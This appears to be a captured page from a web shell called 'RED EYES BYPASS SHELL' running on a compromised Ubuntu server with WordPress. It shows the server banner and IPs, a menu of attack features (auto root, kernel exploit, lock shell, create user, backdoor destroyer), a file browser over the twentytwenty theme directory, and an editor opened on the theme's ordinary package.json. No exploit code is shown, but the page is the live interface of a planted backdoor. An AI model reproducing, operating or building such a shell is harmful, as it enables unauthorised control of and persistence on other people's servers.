Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
twentytwenty /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
404.php
813
B
-rwxr-xr-x
comments.php
3.13
KB
-rwxr-xr-x
footer.php
2.07
KB
-rwxr-xr-x
functions.php
28.58
KB
-rwxr-xr-x
header.php
4.96
KB
-rwxr-xr-x
index.php
2.9
KB
-rwxr-xr-x
package-lock.json
1.16
MB
-rwxr-xr-x
package.json
2.07
KB
-rwxr-xr-x
print.css
2.64
KB
-rwxr-xr-x
readme.txt
5.76
KB
-rwxr-xr-x
screenshot.png
51.82
KB
-rwxr-xr-x
searchform.php
1.73
KB
-rwxr-xr-x
singular.php
550
B
-rwxr-xr-x
style-rtl.css
119.46
KB
-rwxr-xr-x
style.css
120.46
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "twentytwenty", "version": "3.0.0", "description": "Default WP Theme", "author": "The WordPress Contributors", "license": "GPL-2.0-or-later", "keywords": [ "WordPress", "Theme", "TwentyTwenty" ], "homepage": "https://wordpress.org/themes/twentytwenty/", "repository": { "type": "svn", "url": "https://develop.svn.wordpress.org/trunk" }, "bugs": { "url": "https://core.trac.wordpress.org/" }, "engines": { "node": ">=16", "npm": ">=9.8.1" }, "devDependencies": { "@wordpress/browserslist-config": "^6.34.0", "@wordpress/scripts": "^30.27.0", "autoprefixer": "^10.4.22", "concurrently": "^9.2.1", "postcss": "^8.5.6", "postcss-cli": "^11.0.1", "rtlcss": "^4.3.0", "stylelint-a11y": "^1.2.3" }, "browserslist": [ "extends @wordpress/browserslist-config" ], "rtlcssConfig": { "options": { "autoRename": false, "autoRenameStrict": false, "clean": true, "greedy": false, "processUrls": false, "stringMap": [] }, "plugins": [], "map": false }, "scripts": { "build": "npm run build:vendor-prefixes && npm run build:rtl", "build:rtl": "concurrently \"npm run build:rtl-style\" \"npm run build:rtl-esb\" \"npm run build:rtl-esc\"", "build:rtl-style": "rtlcss style.css style-rtl.css", "build:rtl-esb": "rtlcss assets/css/editor-style-block.css assets/css/editor-style-block-rtl.css", "build:rtl-esc": "rtlcss assets/css/editor-style-classic.css assets/css/editor-style-classic-rtl.css", "build:vendor-prefixes": "concurrently \"npm run build:vendor-prefixes-style\" \"npm run build:vendor-prefixes-esb\" \"npm run build:vendor-prefixes-esc\"", "build:vendor-prefixes-style": "postcss -r --no-map style.css assets/css/editor-style-block.css assets/css/editor-style-classic.css", "build:vendor-prefixes-esb": "postcss -r --no-map assets/css/editor-style-block.css ", "build:vendor-prefixes-esc": "postcss -r --no-map assets/css/editor-style-classic.css", "lint:css": "wp-scripts lint-style 'style.css' 'assets/**/*.css'", "lint:js": "wp-scripts lint-js 'assets/**/*.js'", "lint:pkg-json": "wp-scripts lint-pkg-json" } }
Close